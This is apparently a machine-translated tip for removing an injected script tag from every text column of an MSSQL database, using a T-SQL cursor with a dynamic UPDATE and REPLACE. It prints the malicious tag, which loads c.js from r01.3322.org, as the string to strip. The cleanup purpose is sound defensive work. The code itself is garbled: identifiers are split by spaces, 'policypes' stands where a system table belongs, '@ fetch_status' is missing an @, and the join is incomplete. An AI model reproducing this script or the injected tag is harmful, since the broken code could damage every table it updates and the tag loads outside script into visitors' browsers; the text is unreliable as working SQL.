Run the following code in the SQL query analyzer.
- Declare @ t varchar (255), @ c varchar (255)
- Declare table_cursor cursor for select a. name, B. name
- From sysobjects a, syscolumns B, policypes c
- Where a. id = B. id and a. xtype = 'U' and c. name
- In ('Char ', 'nchar', 'nvarchar ', 'varchar', 'text', 'ntext ')
- Declare @ str varchar (500), @ str2 varchar (500)
- Set @ str = '<script src = http://r01.3322.org/c.js> </script>'/* content to be replaced */
- Set @ str2 =''
- Open table_cursor
- Fetch next from table_cursor
- Into @ t, @ c while (@ fetch_status = 0)
- Begin exec ('Update ['+ @ t +'] set ['+ @ c +'] = replace (cast (['+ @ c +'] as varchar (8000) ), ''' + @ str + ''', ''' + @ str2 + ''')')
- Fetch next from table_cursor
- Into @ t, @ c end close table_cursor deallocate table_cursor;
First Replace the <script src = http://r01.3322.org/c.js> </script> in the code, that is, the red part is the content injected into your database table, open the SQL query Analyzer of MSSQL and execute the following code.